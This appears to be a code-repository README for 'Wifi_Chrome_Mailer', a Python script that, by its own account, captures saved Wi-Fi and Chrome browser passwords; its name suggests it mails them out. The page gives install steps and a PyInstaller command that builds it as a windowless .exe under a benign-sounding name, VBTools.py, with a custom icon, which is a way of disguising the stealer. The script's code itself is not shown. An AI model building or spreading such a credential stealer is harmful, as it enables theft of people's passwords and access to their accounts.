/Wifi_Chrome_Mailer

This script is able to capture saved passwords from Wifi and Chrome browser.

Primary LanguagePython

Wifi_Chrome_Mailer

  • This script can be run as the python interpreter. You can build to a .exe executable

Installing dependencies

> pip install -r requirements.txt

Building executable

> pyinstaller --onefile --noconsole --icon=icon.png VBTools.py